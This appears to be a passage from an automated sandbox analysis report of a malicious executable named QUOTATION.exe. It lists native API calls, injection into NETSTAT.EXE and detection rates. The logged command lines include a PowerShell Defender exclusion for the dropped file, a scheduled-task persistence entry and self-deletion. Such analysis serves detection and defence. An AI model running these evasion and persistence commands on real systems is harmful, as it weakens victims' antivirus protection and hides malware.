Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_00402FB0	17_2_00402FB0
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_00FEB090	17_2_00FEB090
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_00FFA830	17_2_00FFA830
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_01091002	17_2_01091002
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_010AE824	17_2_010AE824
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_00FF99BF	17_2_00FF99BF
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_010020A0	17_2_010020A0
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_010A20A8	17_2_010A20A8
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_00FF4120	17_2_00FF4120
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_010A28EC	17_2_010A28EC
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_00FDF900	17_2_00FDF900
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_010A2B28	17_2_010A2B28
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_0107CB4F	17_2_0107CB4F
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_0100138B	17_2_0100138B
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_0100EBB0	17_2_0100EBB0
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_010903DA	17_2_010903DA
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_0100ABD8	17_2_0100ABD8
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_0109DBD2	17_2_0109DBD2
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_010823E3	17_2_010823E3
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_0108FA2B	17_2_0108FA2B
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_010A22AE	17_2_010A22AE
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_00FFAB40	17_2_00FFAB40
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_01094AEF	17_2_01094AEF
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_00FFA309	17_2_00FFA309
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_010A2D07	17_2_010A2D07
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_010A1D55	17_2_010A1D55
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_01002581	17_2_01002581
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_00FFB477	17_2_00FFB477
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_01092D82	17_2_01092D82
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_010A25DD	17_2_010A25DD
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_00FE841F	17_2_00FE841F
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_00FED5E0	17_2_00FED5E0
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_0109D466	17_2_0109D466
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_01094496	17_2_01094496
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_00FD0D20	17_2_00FD0D20
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_010ADFCE	17_2_010ADFCE
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_00FF6E30	17_2_00FF6E30
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_010A1FF1	17_2_010A1FF1
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_0109D616	17_2_0109D616
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_010A2EF7	17_2_010A2EF7
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_00522050	17_2_00522050
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_03312B28	24_2_03312B28
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_0326A309	24_2_0326A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_0326AB40	24_2_0326AB40
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_0327EBB0	24_2_0327EBB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_032F23E3	24_2_032F23E3
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_0330DBD2	24_2_0330DBD2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_033003DA	24_2_033003DA
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_0327ABD8	24_2_0327ABD8
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_032FFA2B	24_2_032FFA2B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_033122AE	24_2_033122AE
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_03304AEF	24_2_03304AEF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_03264120	24_2_03264120
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_0324F900	24_2_0324F900
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_032699BF	24_2_032699BF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_0331E824	24_2_0331E824
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_0326A830	24_2_0326A830
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_03301002	24_2_03301002
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_032720A0	24_2_032720A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_033120A8	24_2_033120A8
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_0325B090	24_2_0325B090
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_033128EC	24_2_033128EC
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_03311FF1	24_2_03311FF1
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_0331DFCE	24_2_0331DFCE
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_03266E30	24_2_03266E30
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_0330D616	24_2_0330D616
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_03312EF7	24_2_03312EF7
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_03240D20	24_2_03240D20
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_03312D07	24_2_03312D07
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_03311D55	24_2_03311D55
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_03272581	24_2_03272581
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_03302D82	24_2_03302D82
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_0325D5E0	24_2_0325D5E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_033125DD	24_2_033125DD
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_0325841F	24_2_0325841F
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_0330D466	24_2_0330D466
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_03304496	24_2_03304496
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_0074E887	24_2_0074E887
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_00732D90	24_2_00732D90
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_00739E60	24_2_00739E60
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_00739E5B	24_2_00739E5B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_00732FB0	24_2_00732FB0

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: String function: 0324B150 appears 133 times
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: String function: 00FDB150 appears 136 times

Contains functionality to call native functions

Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_0041A360 NtCreateFile,	17_2_0041A360
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_0041A410 NtReadFile,	17_2_0041A410
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_0041A490 NtClose,	17_2_0041A490
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_0041A540 NtAllocateVirtualMemory,	17_2_0041A540
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_0041A35B NtCreateFile,	17_2_0041A35B
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_0041A40A NtReadFile,	17_2_0041A40A
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_0041A48A NtClose,	17_2_0041A48A
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_0041A53C NtAllocateVirtualMemory,	17_2_0041A53C
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_01019910 NtAdjustPrivilegesToken,LdrInitializeThunk,	17_2_01019910
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_010199A0 NtCreateSection,LdrInitializeThunk,	17_2_010199A0
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_01019840 NtDelayExecution,LdrInitializeThunk,	17_2_01019840
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_01019860 NtQuerySystemInformation,LdrInitializeThunk,	17_2_01019860
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_010198F0 NtReadVirtualMemory,LdrInitializeThunk,	17_2_010198F0
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_01019A00 NtProtectVirtualMemory,LdrInitializeThunk,	17_2_01019A00
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_01019A20 NtResumeThread,LdrInitializeThunk,	17_2_01019A20
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_01019A50 NtCreateFile,LdrInitializeThunk,	17_2_01019A50
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_01019540 NtReadFile,LdrInitializeThunk,	17_2_01019540
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_010195D0 NtClose,LdrInitializeThunk,	17_2_010195D0
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_01019710 NtQueryInformationToken,LdrInitializeThunk,	17_2_01019710
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_01019780 NtMapViewOfSection,LdrInitializeThunk,	17_2_01019780
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_010197A0 NtUnmapViewOfSection,LdrInitializeThunk,	17_2_010197A0
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_01019660 NtAllocateVirtualMemory,LdrInitializeThunk,	17_2_01019660
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_010196E0 NtFreeVirtualMemory,LdrInitializeThunk,	17_2_010196E0
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_01019950 NtQueueApcThread,	17_2_01019950
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_010199D0 NtCreateProcessEx,	17_2_010199D0
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_01019820 NtEnumerateKey,	17_2_01019820
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_0101B040 NtSuspendThread,	17_2_0101B040
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_010198A0 NtWriteVirtualMemory,	17_2_010198A0
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_01019B00 NtSetValueKey,	17_2_01019B00
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_0101A3B0 NtGetContextThread,	17_2_0101A3B0
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_01019A10 NtQuerySection,	17_2_01019A10
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_01019A80 NtOpenDirectoryObject,	17_2_01019A80
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_01019520 NtWaitForSingleObject,	17_2_01019520
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_0101AD30 NtSetContextThread,	17_2_0101AD30
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_01019560 NtWriteFile,	17_2_01019560
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_010195F0 NtQueryInformationFile,	17_2_010195F0
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_0101A710 NtOpenProcessToken,	17_2_0101A710
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_01019730 NtQueryVirtualMemory,	17_2_01019730
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_01019760 NtOpenProcess,	17_2_01019760
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_0101A770 NtOpenThread,	17_2_0101A770
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_01019770 NtSetInformationFile,	17_2_01019770
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_01019FE0 NtCreateMutant,	17_2_01019FE0
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_01019610 NtEnumerateValueKey,	17_2_01019610
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_01019650 NtQueryValueKey,	17_2_01019650
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_01019670 NtQueryInformationProcess,	17_2_01019670
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 17_2_010196D0 NtCreateKey,	17_2_010196D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_03289A50 NtCreateFile,LdrInitializeThunk,	24_2_03289A50
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_03289910 NtAdjustPrivilegesToken,LdrInitializeThunk,	24_2_03289910
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_032899A0 NtCreateSection,LdrInitializeThunk,	24_2_032899A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_03289860 NtQuerySystemInformation,LdrInitializeThunk,	24_2_03289860
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_03289840 NtDelayExecution,LdrInitializeThunk,	24_2_03289840
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_03289710 NtQueryInformationToken,LdrInitializeThunk,	24_2_03289710
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_03289780 NtMapViewOfSection,LdrInitializeThunk,	24_2_03289780
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_03289FE0 NtCreateMutant,LdrInitializeThunk,	24_2_03289FE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_03289660 NtAllocateVirtualMemory,LdrInitializeThunk,	24_2_03289660
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_03289650 NtQueryValueKey,LdrInitializeThunk,	24_2_03289650
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_032896E0 NtFreeVirtualMemory,LdrInitializeThunk,	24_2_032896E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_032896D0 NtCreateKey,LdrInitializeThunk,	24_2_032896D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_03289540 NtReadFile,LdrInitializeThunk,	24_2_03289540
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_032895D0 NtClose,LdrInitializeThunk,	24_2_032895D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_03289B00 NtSetValueKey,	24_2_03289B00
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_0328A3B0 NtGetContextThread,	24_2_0328A3B0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_03289A20 NtResumeThread,	24_2_03289A20
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_03289A00 NtProtectVirtualMemory,	24_2_03289A00
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_03289A10 NtQuerySection,	24_2_03289A10
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_03289A80 NtOpenDirectoryObject,	24_2_03289A80
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_03289950 NtQueueApcThread,	24_2_03289950
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_032899D0 NtCreateProcessEx,	24_2_032899D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_03289820 NtEnumerateKey,	24_2_03289820
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_0328B040 NtSuspendThread,	24_2_0328B040
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_032898A0 NtWriteVirtualMemory,	24_2_032898A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_032898F0 NtReadVirtualMemory,	24_2_032898F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_03289730 NtQueryVirtualMemory,	24_2_03289730
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_0328A710 NtOpenProcessToken,	24_2_0328A710
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_03289760 NtOpenProcess,	24_2_03289760
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_0328A770 NtOpenThread,	24_2_0328A770
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_03289770 NtSetInformationFile,	24_2_03289770
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_032897A0 NtUnmapViewOfSection,	24_2_032897A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_03289610 NtEnumerateValueKey,	24_2_03289610
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_03289670 NtQueryInformationProcess,	24_2_03289670
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_03289520 NtWaitForSingleObject,	24_2_03289520
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_0328AD30 NtSetContextThread,	24_2_0328AD30
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_03289560 NtWriteFile,	24_2_03289560
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_032895F0 NtQueryInformationFile,	24_2_032895F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_0074A360 NtCreateFile,	24_2_0074A360
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_0074A410 NtReadFile,	24_2_0074A410
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_0074A490 NtClose,	24_2_0074A490
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_0074A540 NtAllocateVirtualMemory,	24_2_0074A540
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_0074A35B NtCreateFile,	24_2_0074A35B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_0074A40A NtReadFile,	24_2_0074A40A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_0074A48A NtClose,	24_2_0074A48A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 24_2_0074A53C NtAllocateVirtualMemory,	24_2_0074A53C

Sample file is different than original file name gathered from version info

Source: QUOTATION.exe, 00000001.00000002.297891578.000000000040A000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameAppDomainInitializerIn.exeB vs QUOTATION.exe
Source: QUOTATION.exe, 00000001.00000002.302035905.00000000059B0000.00000004.00020000.sdmp	Binary or memory string: OriginalFilenameUI.dllF vs QUOTATION.exe
Source: QUOTATION.exe, 00000001.00000003.287892144.00000000037E4000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameUI.dllF vs QUOTATION.exe
Source: QUOTATION.exe, 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameInnerException.dll" vs QUOTATION.exe
Source: QUOTATION.exe, 0000000D.00000000.290403933.00000000003DA000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameAppDomainInitializerIn.exeB vs QUOTATION.exe
Source: QUOTATION.exe, 00000011.00000002.378944407.000000000125F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs QUOTATION.exe
Source: QUOTATION.exe, 00000011.00000000.296533989.00000000005CA000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameAppDomainInitializerIn.exeB vs QUOTATION.exe
Source: QUOTATION.exe, 00000011.00000002.378732031.00000000010CF000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs QUOTATION.exe
Source: QUOTATION.exe, 00000011.00000002.378505567.0000000000FA0000.00000040.00020000.sdmp	Binary or memory string: OriginalFilenamenetstat.exej% vs QUOTATION.exe
Source: QUOTATION.exe	Binary or memory string: OriginalFilenameAppDomainInitializerIn.exeB vs QUOTATION.exe

Source: QUOTATION.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: lQdAGavApIJoo.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: QUOTATION.exe	Virustotal: Detection: 40%
Source: QUOTATION.exe	ReversingLabs: Detection: 18%

Source: C:\Users\user\Desktop\QUOTATION.exe

File read: C:\Users\user\Desktop\QUOTATION.exe

Source: unknown	Process created: C:\Users\user\Desktop\QUOTATION.exe "C:\Users\user\Desktop\QUOTATION.exe"
Source: C:\Users\user\Desktop\QUOTATION.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\QUOTATION.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lQdAGavApIJoo" /XML "C:\Users\user\AppData\Local\Temp\tmp8E88.tmp
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\QUOTATION.exe	Process created: C:\Users\user\Desktop\QUOTATION.exe C:\Users\user\Desktop\QUOTATION.exe
Source: C:\Users\user\Desktop\QUOTATION.exe	Process created: C:\Users\user\Desktop\QUOTATION.exe C:\Users\user\Desktop\QUOTATION.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
Source: C:\Users\user\Desktop\QUOTATION.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\QUOTATION.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\QUOTATION.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lQdAGavApIJoo" /XML "C:\Users\user\AppData\Local\Temp\tmp8E88.tmp	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process created: C:\Users\user\Desktop\QUOTATION.exe C:\Users\user\Desktop\QUOTATION.exe	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process created: C:\Users\user\Desktop\QUOTATION.exe C:\Users\user\Desktop\QUOTATION.exe	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\QUOTATION.exe"	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7164:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6936:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3180:120:WilError_01

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: QUOTATION.exe, Views/MainForm.cs	.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: lQdAGavApIJoo.exe.1.dr, Views/MainForm.cs	.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.2.QUOTATION.exe.360000.0.unpack, Views/MainForm.cs	.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.QUOTATION.exe.360000.0.unpack, Views/MainForm.cs	.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.0.QUOTATION.exe.330000.0.unpack, Views/MainForm.cs	.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.0.QUOTATION.exe.330000.3.unpack, Views/MainForm.cs	.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.0.QUOTATION.exe.330000.2.unpack, Views/MainForm.cs	.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.2.QUOTATION.exe.330000.0.unpack, Views/MainForm.cs	.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.0.QUOTATION.exe.330000.1.unpack, Views/MainForm.cs	.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 17.0.QUOTATION.exe.520000.0.unpack, Views/MainForm.cs	.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 17.2.QUOTATION.exe.520000.1.unpack, Views/MainForm.cs	.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 17.0.QUOTATION.exe.520000.3.unpack, Views/MainForm.cs	.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 17.0.QUOTATION.exe.520000.5.unpack, Views/MainForm.cs	.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 17.0.QUOTATION.exe.520000.1.unpack, Views/MainForm.cs	.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 17.0.QUOTATION.exe.520000.2.unpack, Views/MainForm.cs	.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 17.0.QUOTATION.exe.520000.7.unpack, Views/MainForm.cs	.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 17.0.QUOTATION.exe.520000.9.unpack, Views/MainForm.cs	.Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 1_2_0036424F push es; iretd	1_2_0036425C
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 1_2_003642B1 push cs; iretd	1_2_003642CC
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 1_2_00364287 push cs; iretd	1_2_003642B0
